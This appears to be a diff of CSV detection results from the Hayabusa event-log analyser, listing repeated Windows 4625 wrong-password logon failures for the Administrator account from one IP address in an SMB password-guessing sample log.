+2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
